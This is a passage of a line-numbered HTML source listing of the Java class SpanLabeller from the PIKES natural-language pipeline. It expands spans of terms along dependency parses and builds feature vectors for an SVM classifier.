<a class="jxr_linenumber" name="L31" href="#L31">31</a> <strong class="jxr_keyword">import</strong> eu.fbk.dkm.pikes.resources.NAFUtils;
<a class="jxr_linenumber" name="L32" href="#L32">32</a> <strong class="jxr_keyword">import</strong> eu.fbk.utils.eval.ConfusionMatrix;
<a class="jxr_linenumber" name="L33" href="#L33">33</a> <strong class="jxr_keyword">import</strong> eu.fbk.utils.eval.PrecisionRecall;
<a class="jxr_linenumber" name="L34" href="#L34">34</a> <strong class="jxr_keyword">import</strong> eu.fbk.utils.eval.SetPrecisionRecall;
<a class="jxr_linenumber" name="L35" href="#L35">35</a> <strong class="jxr_keyword">import</strong> eu.fbk.utils.svm.Classifier;
<a class="jxr_linenumber" name="L36" href="#L36">36</a> <strong class="jxr_keyword">import</strong> eu.fbk.utils.svm.FeatureStats;
<a class="jxr_linenumber" name="L37" href="#L37">37</a> <strong class="jxr_keyword">import</strong> eu.fbk.utils.svm.LabelledVector;
<a class="jxr_linenumber" name="L38" href="#L38">38</a> <strong class="jxr_keyword">import</strong> eu.fbk.utils.svm.Vector;
<a class="jxr_linenumber" name="L39" href="#L39">39</a>
<a class="jxr_linenumber" name="L40" href="#L40">40</a> <strong class="jxr_keyword">public</strong> <strong class="jxr_keyword">final</strong> <strong class="jxr_keyword">class</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/SpanLabeller.html">SpanLabeller</a> {
<a class="jxr_linenumber" name="L41" href="#L41">41</a>
<a class="jxr_linenumber" name="L42" href="#L42">42</a> <strong class="jxr_keyword">private</strong> <strong class="jxr_keyword">static</strong> <strong class="jxr_keyword">final</strong> Logger LOGGER = LoggerFactory.getLogger(SpanLabeller.<strong class="jxr_keyword">class</strong>);
<a class="jxr_linenumber" name="L43" href="#L43">43</a>
<a class="jxr_linenumber" name="L44" href="#L44">44</a> <strong class="jxr_keyword">private</strong> <strong class="jxr_keyword">final</strong> Classifier classifier;
<a class="jxr_linenumber" name="L45" href="#L45">45</a>
<a class="jxr_linenumber" name="L46" href="#L46">46</a> <strong class="jxr_keyword">private</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/SpanLabeller.html">Predictor</a> predictor;
<a class="jxr_linenumber" name="L47" href="#L47">47</a>
<a class="jxr_linenumber" name="L48" href="#L48">48</a> <strong class="jxr_keyword">private</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/SpanLabeller.html">SpanLabeller</a>(<strong class="jxr_keyword">final</strong> Classifier classifier) {
<a class="jxr_linenumber" name="L49" href="#L49">49</a> <strong class="jxr_keyword">this</strong>.classifier = classifier;
<a class="jxr_linenumber" name="L50" href="#L50">50</a> <strong class="jxr_keyword">this</strong>.predictor = <strong class="jxr_keyword">new</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/SpanLabeller.html">Predictor</a>() {
<a class="jxr_linenumber" name="L51" href="#L51">51</a>
<a class="jxr_linenumber" name="L52" href="#L52">52</a> @Override
<a class="jxr_linenumber" name="L53" href="#L53">53</a> <strong class="jxr_keyword">public</strong> LabelledVector predict(<strong class="jxr_keyword">final</strong> Vector vector) {
<a class="jxr_linenumber" name="L54" href="#L54">54</a> <strong class="jxr_keyword">return</strong> classifier.predict(false, vector);
<a class="jxr_linenumber" name="L55" href="#L55">55</a> }
<a class="jxr_linenumber" name="L56" href="#L56">56</a>
<a class="jxr_linenumber" name="L57" href="#L57">57</a> };
<a class="jxr_linenumber" name="L58" href="#L58">58</a> }
<a class="jxr_linenumber" name="L59" href="#L59">59</a>
<a class="jxr_linenumber" name="L60" href="#L60">60</a> <strong class="jxr_keyword">public</strong> <strong class="jxr_keyword">static</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/SpanLabeller.html">SpanLabeller</a> readFrom(<strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Dep.html">Path</a> path) <strong class="jxr_keyword">throws</strong> IOException {
<a class="jxr_linenumber" name="L61" href="#L61">61</a> <strong class="jxr_keyword">return</strong> <strong class="jxr_keyword">new</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/SpanLabeller.html">SpanLabeller</a>(Classifier.readFrom(path));
<a class="jxr_linenumber" name="L62" href="#L62">62</a> }
<a class="jxr_linenumber" name="L63" href="#L63">63</a>
<a class="jxr_linenumber" name="L64" href="#L64">64</a> <strong class="jxr_keyword">public</strong> Span<Term> expand(<strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/KAFDocument.html">KAFDocument</a> document, <strong class="jxr_keyword">final</strong> Iterable<Term> heads,
<a class="jxr_linenumber" name="L65" href="#L65">65</a> <strong class="jxr_keyword">final</strong> Iterable<Term> excludedTerms, <strong class="jxr_keyword">final</strong> <strong class="jxr_keyword">boolean</strong> merge) {
<a class="jxr_linenumber" name="L66" href="#L66">66</a>
<a class="jxr_linenumber" name="L67" href="#L67">67</a> <em class="jxr_comment">// Start expanding all the heads</em>
<a class="jxr_linenumber" name="L68" href="#L68">68</a> <strong class="jxr_keyword">final</strong> Set<Term> headSet = ImmutableSet.copyOf(heads);
<a class="jxr_linenumber" name="L69" href="#L69">69</a> <strong class="jxr_keyword">final</strong> Set<Term> terms = Sets.newHashSet();
<a class="jxr_linenumber" name="L70" href="#L70">70</a> <strong class="jxr_keyword">for</strong> (<strong class="jxr_keyword">final</strong> Term head : headSet) {
<a class="jxr_linenumber" name="L71" href="#L71">71</a> <strong class="jxr_keyword">final</strong> Iterable<Term> exclusion = Iterables.concat(excludedTerms,
<a class="jxr_linenumber" name="L72" href="#L72">72</a> Sets.difference(headSet, ImmutableSet.of(head)));
<a class="jxr_linenumber" name="L73" href="#L73">73</a> terms.addAll(expand(document, head, exclusion).getTargets());
<a class="jxr_linenumber" name="L74" href="#L74">74</a> }
<a class="jxr_linenumber" name="L75" href="#L75">75</a>
<a class="jxr_linenumber" name="L76" href="#L76">76</a> <em class="jxr_comment">// Return null if no term was selected</em>
<a class="jxr_linenumber" name="L77" href="#L77">77</a> <strong class="jxr_keyword">if</strong> (terms.isEmpty()) {
<a class="jxr_linenumber" name="L78" href="#L78">78</a> <strong class="jxr_keyword">return</strong> KAFDocument.newTermSpan();
<a class="jxr_linenumber" name="L79" href="#L79">79</a> }
<a class="jxr_linenumber" name="L80" href="#L80">80</a>
<a class="jxr_linenumber" name="L81" href="#L81">81</a> <em class="jxr_comment">// Merge separate ranges, if requested and possible</em>
<a class="jxr_linenumber" name="L82" href="#L82">82</a> <strong class="jxr_keyword">if</strong> (merge) {
<a class="jxr_linenumber" name="L83" href="#L83">83</a> <strong class="jxr_keyword">int</strong> startIndex = Integer.MAX_VALUE;
<a class="jxr_linenumber" name="L84" href="#L84">84</a> <strong class="jxr_keyword">int</strong> endIndex = Integer.MIN_VALUE;
<a class="jxr_linenumber" name="L85" href="#L85">85</a> <strong class="jxr_keyword">for</strong> (<strong class="jxr_keyword">final</strong> Term term : terms) {
<a class="jxr_linenumber" name="L86" href="#L86">86</a> <strong class="jxr_keyword">final</strong> <strong class="jxr_keyword">int</strong> index = document.getTerms().indexOf(term);
<a class="jxr_linenumber" name="L87" href="#L87">87</a> startIndex = Math.min(startIndex, index);
<a class="jxr_linenumber" name="L88" href="#L88">88</a> endIndex = Math.max(endIndex, index);
<a class="jxr_linenumber" name="L89" href="#L89">89</a> }
<a class="jxr_linenumber" name="L90" href="#L90">90</a> <strong class="jxr_keyword">for</strong> (<strong class="jxr_keyword">int</strong> i = startIndex + 1; i < endIndex; ++i) {
<a class="jxr_linenumber" name="L91" href="#L91">91</a> <strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Term.html">Term</a> term = document.getTerms().get(i);
<a class="jxr_linenumber" name="L92" href="#L92">92</a> <strong class="jxr_keyword">if</strong> (!terms.contains(term) && terms.contains(document.getTerms().get(i - 1))) {
<a class="jxr_linenumber" name="L93" href="#L93">93</a> <strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Dep.html">Dep</a> dep = document.getDepToTerm(term);
<a class="jxr_linenumber" name="L94" href="#L94">94</a> <strong class="jxr_keyword">if</strong> (dep != <strong class="jxr_keyword">null</strong>) {
<a class="jxr_linenumber" name="L95" href="#L95">95</a> <strong class="jxr_keyword">final</strong> String func = dep.getRfunc().toUpperCase();
<a class="jxr_linenumber" name="L96" href="#L96">96</a> <strong class="jxr_keyword">if</strong> ((func.contains(<span class="jxr_string">"COORD"</span>) || func.equals(<span class="jxr_string">"P"</span>))
<a class="jxr_linenumber" name="L97" href="#L97">97</a> && (terms.contains(document.getTerms().get(i + 1)) || i + 2 <= endIndex
<a class="jxr_linenumber" name="L98" href="#L98">98</a> && terms.contains(document.getTerms().get(i + 2)))) {
<a class="jxr_linenumber" name="L99" href="#L99">99</a> terms.add(term);
<a class="jxr_linenumber" name="L100" href="#L100">100</a> }
<a class="jxr_linenumber" name="L101" href="#L101">101</a> }
<a class="jxr_linenumber" name="L102" href="#L102">102</a> }
<a class="jxr_linenumber" name="L103" href="#L103">103</a> }
<a class="jxr_linenumber" name="L104" href="#L104">104</a> }
<a class="jxr_linenumber" name="L105" href="#L105">105</a>
<a class="jxr_linenumber" name="L106" href="#L106">106</a> <em class="jxr_comment">// Create and return the resulting span, setting all the heads in it</em>
<a class="jxr_linenumber" name="L107" href="#L107">107</a> <strong class="jxr_keyword">final</strong> Span<Term> result = KAFDocument.newTermSpan(Ordering.from(Term.OFFSET_COMPARATOR)
<a class="jxr_linenumber" name="L108" href="#L108">108</a> .sortedCopy(terms));
<a class="jxr_linenumber" name="L109" href="#L109">109</a> Iterables.addAll(result.getHeads(), headSet);
<a class="jxr_linenumber" name="L110" href="#L110">110</a> <strong class="jxr_keyword">return</strong> result;
<a class="jxr_linenumber" name="L111" href="#L111">111</a> }
<a class="jxr_linenumber" name="L112" href="#L112">112</a>
<a class="jxr_linenumber" name="L113" href="#L113">113</a> <strong class="jxr_keyword">public</strong> Span<Term> expand(<strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/KAFDocument.html">KAFDocument</a> document, <strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Term.html">Term</a> head,
<a class="jxr_linenumber" name="L114" href="#L114">114</a> <strong class="jxr_keyword">final</strong> Iterable<Term> excludedTerms) {
<a class="jxr_linenumber" name="L115" href="#L115">115</a> <strong class="jxr_keyword">return</strong> expand(document, <strong class="jxr_keyword">this</strong>.predictor, excludedTerms, getMinimalSpan(document, head));
<a class="jxr_linenumber" name="L116" href="#L116">116</a> }
<a class="jxr_linenumber" name="L117" href="#L117">117</a>
<a class="jxr_linenumber" name="L118" href="#L118">118</a> <strong class="jxr_keyword">private</strong> <strong class="jxr_keyword">static</strong> Span<Term> expand(<strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/KAFDocument.html">KAFDocument</a> document, <strong class="jxr_keyword">final</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/SpanLabeller.html">Predictor</a> predictor,
<a class="jxr_linenumber" name="L119" href="#L119">119</a> @Nullable <strong class="jxr_keyword">final</strong> Iterable<Term> marked, <strong class="jxr_keyword">final</strong> Span<Term> span) {
<a class="jxr_linenumber" name="L120" href="#L120">120</a>
<a class="jxr_linenumber" name="L121" href="#L121">121</a> <em class="jxr_comment">// Build a set of marked term</em>
<a class="jxr_linenumber" name="L122" href="#L122">122</a> <strong class="jxr_keyword">final</strong> Set<Term> markedSet = marked == <strong class="jxr_keyword">null</strong> ? ImmutableSet.of() : ImmutableSet
<a class="jxr_linenumber" name="L123" href="#L123">123</a> .copyOf(marked);
<a class="jxr_linenumber" name="L124" href="#L124">124</a>
<a class="jxr_linenumber" name="L125" href="#L125">125</a> <em class="jxr_comment">// Select terms recursively</em>
<a class="jxr_linenumber" name="L126" href="#L126">126</a> <strong class="jxr_keyword">final</strong> Set<Term> selection = Sets.newHashSet();
<a class="jxr_linenumber" name="L127" href="#L127">127</a> expandRecursive(document, predictor, markedSet, span, span, 0, selection);
<a class="jxr_linenumber" name="L128" href="#L128">128</a>
<a class="jxr_linenumber" name="L129" href="#L129">129</a> <em class="jxr_comment">// Create and return resulting span</em>
<a class="jxr_linenumber" name="L130" href="#L130">130</a> <strong class="jxr_keyword">final</strong> Span<Term> result = KAFDocument.newTermSpan(Ordering.from(Term.OFFSET_COMPARATOR)
<a class="jxr_linenumber" name="L131" href="#L131">131</a> .sortedCopy(selection), NAFUtils.extractHead(document, span));
<a class="jxr_linenumber" name="L132" href="#L132">132</a> <em class="jxr_comment">// System.out.println(span.getStr() + " -> " + result.getStr()); // TODO</em>
<a class="jxr_linenumber" name="L133" href="#L133">133</a> <strong class="jxr_keyword">return</strong> result;
<a class="jxr_linenumber" name="L134" href="#L134">134</a> }
<a class="jxr_linenumber" name="L135" href="#L135">135</a>
<a class="jxr_linenumber" name="L136" href="#L136">136</a> <strong class="jxr_keyword">private</strong> <strong class="jxr_keyword">static</strong> <strong class="jxr_keyword">void</strong> expandRecursive(<strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/KAFDocument.html">KAFDocument</a> document, <strong class="jxr_keyword">final</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/SpanLabeller.html">Predictor</a> predictor,
<a class="jxr_linenumber" name="L137" href="#L137">137</a> <strong class="jxr_keyword">final</strong> Set<Term> marked, <strong class="jxr_keyword">final</strong> Span<Term> span, <strong class="jxr_keyword">final</strong> Span<Term> root, <strong class="jxr_keyword">final</strong> <strong class="jxr_keyword">int</strong> depth,
<a class="jxr_linenumber" name="L138" href="#L138">138</a> <strong class="jxr_keyword">final</strong> Set<Term> selection) {
<a class="jxr_linenumber" name="L139" href="#L139">139</a>
<a class="jxr_linenumber" name="L140" href="#L140">140</a> <em class="jxr_comment">// Add the supplied span to the selection</em>
<a class="jxr_linenumber" name="L141" href="#L141">141</a> selection.addAll(span.getTargets());
<a class="jxr_linenumber" name="L142" href="#L142">142</a>
<a class="jxr_linenumber" name="L143" href="#L143">143</a> <em class="jxr_comment">// Build a list of related terms comprising R, Q, V, G, D terms dominated by the head</em>
<a class="jxr_linenumber" name="L144" href="#L144">144</a> <strong class="jxr_keyword">final</strong> List<Span<Term>> children = Lists.newArrayList();
<a class="jxr_linenumber" name="L145" href="#L145">145</a> <strong class="jxr_keyword">for</strong> (<strong class="jxr_keyword">final</strong> Term head : span.getTargets()) {
<a class="jxr_linenumber" name="L146" href="#L146">146</a> <strong class="jxr_keyword">final</strong> List<Term> queue = Lists.newLinkedList();
<a class="jxr_linenumber" name="L147" href="#L147">147</a> queue.add(head);
<a class="jxr_linenumber" name="L148" href="#L148">148</a> <strong class="jxr_keyword">while</strong> (!queue.isEmpty()) {
<a class="jxr_linenumber" name="L149" href="#L149">149</a> <strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Term.html">Term</a> term = queue.remove(0);
<a class="jxr_linenumber" name="L150" href="#L150">150</a> <strong class="jxr_keyword">final</strong> List<Dep> deps = document.getDepsFromTerm(term);
<a class="jxr_linenumber" name="L151" href="#L151">151</a> <strong class="jxr_keyword">if</strong> (!deps.isEmpty()) {
<a class="jxr_linenumber" name="L152" href="#L152">152</a> <strong class="jxr_keyword">for</strong> (<strong class="jxr_keyword">final</strong> Dep dep : deps) {
<a class="jxr_linenumber" name="L153" href="#L153">153</a> <strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Term.html">Term</a> to = dep.getTo();
<a class="jxr_linenumber" name="L154" href="#L154">154</a> <strong class="jxr_keyword">if</strong> (!span.getTargets().contains(to)) {
<a class="jxr_linenumber" name="L155" href="#L155">155</a> <strong class="jxr_keyword">if</strong> (<span class="jxr_string">"PC"</span>.contains(to.getPos())) {
<a class="jxr_linenumber" name="L156" href="#L156">156</a> queue.add(to);
<a class="jxr_linenumber" name="L157" href="#L157">157</a> } <strong class="jxr_keyword">else</strong> {
<a class="jxr_linenumber" name="L158" href="#L158">158</a> children.add(getMinimalSpan(document, to));
<a class="jxr_linenumber" name="L159" href="#L159">159</a> }
<a class="jxr_linenumber" name="L160" href="#L160">160</a> }
<a class="jxr_linenumber" name="L161" href="#L161">161</a> }
<a class="jxr_linenumber" name="L162" href="#L162">162</a> } <strong class="jxr_keyword">else</strong> <strong class="jxr_keyword">if</strong> (!span.getTargets().contains(term)) {
<a class="jxr_linenumber" name="L163" href="#L163">163</a> children.add(getMinimalSpan(document, term));
<a class="jxr_linenumber" name="L164" href="#L164">164</a> }
<a class="jxr_linenumber" name="L165" href="#L165">165</a> }
<a class="jxr_linenumber" name="L166" href="#L166">166</a> }
<a class="jxr_linenumber" name="L167" href="#L167">167</a>
<a class="jxr_linenumber" name="L168" href="#L168">168</a> <em class="jxr_comment">// Sort child spans by absolute offset distance w.r.t. reference span</em>
<a class="jxr_linenumber" name="L169" href="#L169">169</a> <strong class="jxr_keyword">final</strong> <strong class="jxr_keyword">int</strong> offset = getSpanOffset(span);
<a class="jxr_linenumber" name="L170" href="#L170">170</a> Collections.sort(children, <strong class="jxr_keyword">new</strong> Comparator<Span<Term>>() {
<a class="jxr_linenumber" name="L171" href="#L171">171</a>
<a class="jxr_linenumber" name="L172" href="#L172">172</a> @Override
<a class="jxr_linenumber" name="L173" href="#L173">173</a> <strong class="jxr_keyword">public</strong> <strong class="jxr_keyword">int</strong> compare(<strong class="jxr_keyword">final</strong> Span<Term> span1, <strong class="jxr_keyword">final</strong> Span<Term> span2) {
<a class="jxr_linenumber" name="L174" href="#L174">174</a> <strong class="jxr_keyword">final</strong> <strong class="jxr_keyword">int</strong> distance1 = Math.abs(offset - getSpanOffset(span1));
<a class="jxr_linenumber" name="L175" href="#L175">175</a> <strong class="jxr_keyword">final</strong> <strong class="jxr_keyword">int</strong> distance2 = Math.abs(offset - getSpanOffset(span2));
<a class="jxr_linenumber" name="L176" href="#L176">176</a> <strong class="jxr_keyword">return</strong> distance1 - distance2;
<a class="jxr_linenumber" name="L177" href="#L177">177</a> }
<a class="jxr_linenumber" name="L178" href="#L178">178</a>
<a class="jxr_linenumber" name="L179" href="#L179">179</a> });
<a class="jxr_linenumber" name="L180" href="#L180">180</a>
<a class="jxr_linenumber" name="L181" href="#L181">181</a> <em class="jxr_comment">// Select terms, relying on the supplied predictor</em>
<a class="jxr_linenumber" name="L182" href="#L182">182</a> <strong class="jxr_keyword">for</strong> (<strong class="jxr_keyword">final</strong> Span<Term> child : children) {
<a class="jxr_linenumber" name="L183" href="#L183">183</a> <strong class="jxr_keyword">final</strong> Vector features = features(document, marked, selection, root, span, child, depth);
<a class="jxr_linenumber" name="L184" href="#L184">184</a> <strong class="jxr_keyword">if</strong> (predictor.predict(features).getLabel() == 1) {
<a class="jxr_linenumber" name="L185" href="#L185">185</a> <strong class="jxr_keyword">for</strong> (<strong class="jxr_keyword">final</strong> Term term : child.getTargets()) {
<a class="jxr_linenumber" name="L186" href="#L186">186</a> <strong class="jxr_keyword">for</strong> (Dep dep = document.getDepToTerm(term); dep != <strong class="jxr_keyword">null</strong>
<a class="jxr_linenumber" name="L187" href="#L187">187</a> && !selection.contains(dep.getFrom()); dep = document.getDepToTerm(dep
<a class="jxr_linenumber" name="L188" href="#L188">188</a> .getFrom())) {
<a class="jxr_linenumber" name="L189" href="#L189">189</a> selection.add(dep.getFrom());
<a class="jxr_linenumber" name="L190" href="#L190">190</a> }
<a class="jxr_linenumber" name="L191" href="#L191">191</a> }
<a class="jxr_linenumber" name="L192" href="#L192">192</a> expandRecursive(document, predictor, marked, child, root, depth + 1, selection);
<a class="jxr_linenumber" name="L193" href="#L193">193</a> }
<a class="jxr_linenumber" name="L194" href="#L194">194</a> }
<a class="jxr_linenumber" name="L195" href="#L195">195</a> }
<a class="jxr_linenumber" name="L196" href="#L196">196</a>
<a class="jxr_linenumber" name="L197" href="#L197">197</a> <em class="jxr_comment">// private static List<String> features(final String prefix, final Term term,</em>
<a class="jxr_linenumber" name="L198" href="#L198">198</a> <em class="jxr_comment">// final String externalRefResource) {</em>
<a class="jxr_linenumber" name="L199" href="#L199">199</a> <em class="jxr_comment">// final List<String> result = Lists.newArrayList();</em>
<a class="jxr_linenumber" name="L200" href="#L200">200</a> <em class="jxr_comment">// for (final ExternalRef ref : NAFUtils.getRefs(term, externalRefResource, null)) {</em>
<a class="jxr_linenumber" name="L201" href="#L201">201</a> <em class="jxr_comment">// result.add(prefix + ref.getReference());</em>
<a class="jxr_linenumber" name="L202" href="#L202">202</a> <em class="jxr_comment">// }</em>
<a class="jxr_linenumber" name="L203" href="#L203">203</a> <em class="jxr_comment">// return result;</em>
<a class="jxr_linenumber" name="L204" href="#L204">204</a> <em class="jxr_comment">// }</em>
<a class="jxr_linenumber" name="L205" href="#L205">205</a>
<a class="jxr_linenumber" name="L206" href="#L206">206</a> <strong class="jxr_keyword">private</strong> <strong class="jxr_keyword">static</strong> List<String> features(<strong class="jxr_keyword">final</strong> String prefix, <strong class="jxr_keyword">final</strong> Range parent, <strong class="jxr_keyword">final</strong> Range child) {
<a class="jxr_linenumber" name="L207" href="#L207">207</a> <strong class="jxr_keyword">final</strong> <strong class="jxr_keyword">int</strong> dist = parent.distance(child);
<a class="jxr_linenumber" name="L208" href="#L208">208</a> <strong class="jxr_keyword">final</strong> String direction = child.begin() > parent.begin() ? <span class="jxr_string">"after"</span> : <span class="jxr_string">"before"</span>;
<a class="jxr_linenumber" name="L209" href="#L209">209</a> <strong class="jxr_keyword">final</strong> String distance = dist <= 1 ? <span class="jxr_string">"adjacent"</span> : dist <= 3 ? <span class="jxr_string">"verynear"</span>
<a class="jxr_linenumber" name="L210" href="#L210">210</a> : dist <= 6 ? <span class="jxr_string">"near"</span> : <span class="jxr_string">"far"</span>;
<a class="jxr_linenumber" name="L211" href="#L211">211</a> <strong class="jxr_keyword">return</strong> ImmutableList.of(prefix + distance, prefix + direction, prefix + direction + <span class="jxr_string">"."</span>
<a class="jxr_linenumber" name="L212" href="#L212">212</a> + distance);
<a class="jxr_linenumber" name="L213" href="#L213">213</a> }
<a class="jxr_linenumber" name="L214" href="#L214">214</a>
<a class="jxr_linenumber" name="L215" href="#L215">215</a> <strong class="jxr_keyword">private</strong> <strong class="jxr_keyword">static</strong> Vector features(<strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/KAFDocument.html">KAFDocument</a> document, <strong class="jxr_keyword">final</strong> Set<Term> marked,
<a class="jxr_linenumber" name="L216" href="#L216">216</a> <strong class="jxr_keyword">final</strong> Set<Term> selection, <strong class="jxr_keyword">final</strong> Span<Term> root, <strong class="jxr_keyword">final</strong> Span<Term> parent,
<a class="jxr_linenumber" name="L217" href="#L217">217</a> <strong class="jxr_keyword">final</strong> Span<Term> child, <strong class="jxr_keyword">final</strong> <strong class="jxr_keyword">int</strong> depth) {
<a class="jxr_linenumber" name="L218" href="#L218">218</a>
<a class="jxr_linenumber" name="L219" href="#L219">219</a> <em class="jxr_comment">// Extract main terms</em>
<a class="jxr_linenumber" name="L220" href="#L220">220</a> <em class="jxr_comment">// final Term rootTerm = getMainTerm(document, root);</em>
<a class="jxr_linenumber" name="L221" href="#L221">221</a> <strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Term.html">Term</a> parentTerm = getMainTerm(document, parent);
<a class="jxr_linenumber" name="L222" href="#L222">222</a> <strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Term.html">Term</a> childTerm = getMainTerm(document, child);
<a class="jxr_linenumber" name="L223" href="#L223">223</a> <strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Term.html">Term</a> childHead = NAFUtils.extractHead(document, child);
<a class="jxr_linenumber" name="L224" href="#L224">224</a>
<a class="jxr_linenumber" name="L225" href="#L225">225</a> <em class="jxr_comment">// Compute dependency data</em>
<a class="jxr_linenumber" name="L226" href="#L226">226</a> <a href="../../../../../../ixa/kaflib/Dep.html">Dep</a> dep = document.getDepToTerm(childHead);
<a class="jxr_linenumber" name="L227" href="#L227">227</a> String path = dep.getRfunc();
<a class="jxr_linenumber" name="L228" href="#L228">228</a> String pathex = dep.getRfunc() + <span class="jxr_string">"-"</span> + dep.getTo().getMorphofeat().substring(0, 1);
<a class="jxr_linenumber" name="L229" href="#L229">229</a> <strong class="jxr_keyword">final</strong> Set<Term> connectives = Sets.newHashSet();
<a class="jxr_linenumber" name="L230" href="#L230">230</a> <strong class="jxr_keyword">while</strong> (!parent.getTargets().contains(dep.getFrom())) {
<a class="jxr_linenumber" name="L231" href="#L231">231</a> connectives.add(dep.getFrom());
<a class="jxr_linenumber" name="L232" href="#L232">232</a> dep = document.getDepToTerm(dep.getFrom());
<a class="jxr_linenumber" name="L233" href="#L233">233</a> path = dep.getRfunc() + <span class="jxr_string">"."</span> + path;
<a class="jxr_linenumber" name="L234" href="#L234">234</a> pathex = dep.getRfunc() + <span class="jxr_string">"-"</span> + dep.getTo().getLemma().toLowerCase() + <span class="jxr_string">"."</span> + pathex;
<a class="jxr_linenumber" name="L235" href="#L235">235</a> }
<a class="jxr_linenumber" name="L236" href="#L236">236</a>
<a class="jxr_linenumber" name="L237" href="#L237">237</a> <em class="jxr_comment">// Allocate a builder for constructing the feature vector</em>
<a class="jxr_linenumber" name="L238" href="#L238">238</a> <strong class="jxr_keyword">final</strong> Vector.Builder builder = Vector.builder();
<a class="jxr_linenumber" name="L239" href="#L239">239</a>
<a class="jxr_linenumber" name="L240" href="#L240">240</a> <em class="jxr_comment">// Add document id (not used for training, only for proper CV splitting)</em>
<a class="jxr_linenumber" name="L241" href="#L241">241</a> builder.set(<span class="jxr_string">"_cluster."</span> + document.getPublic().uri);
<a class="jxr_linenumber" name="L242" href="#L242">242</a>
<a class="jxr_linenumber" name="L243" href="#L243">243</a> <em class="jxr_comment">// Add term index (not used for training / classification)</em>
<a class="jxr_linenumber" name="L244" href="#L244">244</a> builder.set(<span class="jxr_string">"_index"</span>, document.getTerms().indexOf(childTerm));
<a class="jxr_linenumber" name="L245" href="#L245">245</a> builder.set(<span class="jxr_string">"depth"</span> + depth);
<a class="jxr_linenumber" name="L246" href="#L246">246</a>
<a class="jxr_linenumber" name="L247" href="#L247">247</a> <em class="jxr_comment">// Add features related to relative span positions</em>
<a class="jxr_linenumber" name="L248" href="#L248">248</a> <strong class="jxr_keyword">final</strong> Set<Term> descendants = document.getTermsByDepAncestors(Iterables.concat(
<a class="jxr_linenumber" name="L249" href="#L249">249</a> child.getTargets(), connectives));
<a class="jxr_linenumber" name="L250" href="#L250">250</a> <strong class="jxr_keyword">final</strong> Range rootRange = Range.enclose(NAFUtils.termRangesFor(document, root.getTargets()));
<a class="jxr_linenumber" name="L251" href="#L251">251</a> <strong class="jxr_keyword">final</strong> Range parentRange = Range.enclose(NAFUtils.termRangesFor(document,
<a class="jxr_linenumber" name="L252" href="#L252">252</a> parent.getTargets()));
<a class="jxr_linenumber" name="L253" href="#L253">253</a> <strong class="jxr_keyword">final</strong> Range childRange = Range
<a class="jxr_linenumber" name="L254" href="#L254">254</a> .enclose(NAFUtils.termRangesFor(document, child.getTargets()));
<a class="jxr_linenumber" name="L255" href="#L255">255</a> <strong class="jxr_keyword">final</strong> Range descendantsRange = Range
<a class="jxr_linenumber" name="L256" href="#L256">256</a> .enclose(NAFUtils.termRangesFor(document, descendants));
<a class="jxr_linenumber" name="L257" href="#L257">257</a> builder.set(features(<span class="jxr_string">"pos.descroot."</span>, rootRange, descendantsRange));
<a class="jxr_linenumber" name="L258" href="#L258">258</a> builder.set(features(<span class="jxr_string">"pos.descparent."</span>, parentRange, descendantsRange));
<a class="jxr_linenumber" name="L259" href="#L259">259</a> builder.set(features(<span class="jxr_string">"pos.childparent."</span>, parentRange, childRange));
<a class="jxr_linenumber" name="L260" href="#L260">260</a>
<a class="jxr_linenumber" name="L261" href="#L261">261</a> <strong class="jxr_keyword">final</strong> List<Range> parentRanges = NAFUtils.termRangesFor(document, parent.getTargets());
<a class="jxr_linenumber" name="L262" href="#L262">262</a> <strong class="jxr_keyword">final</strong> List<Range> selectionRanges = NAFUtils.termRangesFor(document, selection);
<a class="jxr_linenumber" name="L263" href="#L263">263</a> <strong class="jxr_keyword">final</strong> List<Range> descendantRanges = NAFUtils.termRangesFor(document, descendants);
<a class="jxr_linenumber" name="L264" href="#L264">264</a> builder.set(<span class="jxr_string">"span.enclosed"</span>, Range.enclose(selectionRanges).overlaps(descendantRanges));
<a class="jxr_linenumber" name="L265" href="#L265">265</a> builder.set(<span class="jxr_string">"span.connected"</span>,
<a class="jxr_linenumber" name="L266" href="#L266">266</a> Range.enclose(selectionRanges).connectedWith(descendantRanges));
<a class="jxr_linenumber" name="L267" href="#L267">267</a> builder.set(<span class="jxr_string">"span.connected.parent"</span>,
<a class="jxr_linenumber" name="L268" href="#L268">268</a> Range.enclose(parentRanges).connectedWith(descendantRanges));
<a class="jxr_linenumber" name="L269" href="#L269">269</a> builder.set(<span class="jxr_string">"span.marked"</span>, marked.contains(childTerm));
<a class="jxr_linenumber" name="L270" href="#L270">270</a> builder.set(<span class="jxr_string">"span.marked.descendant"</span>, !Sets.intersection(marked, descendants).isEmpty());
<a class="jxr_linenumber" name="L271" href="#L271">271</a> builder.set(<span class="jxr_string">"span.depth"</span>, depth);
<a class="jxr_linenumber" name="L272" href="#L272">272</a>
<a class="jxr_linenumber" name="L273" href="#L273">273</a> <em class="jxr_comment">// Add root features</em>
<a class="jxr_linenumber" name="L274" href="#L274">274</a> <em class="jxr_comment">// builder.set("parent.pos." + parentTerm.getPos());</em>
<a class="jxr_linenumber" name="L275" href="#L275">275</a> <em class="jxr_comment">// if (parentTerm != rootTerm) {</em>
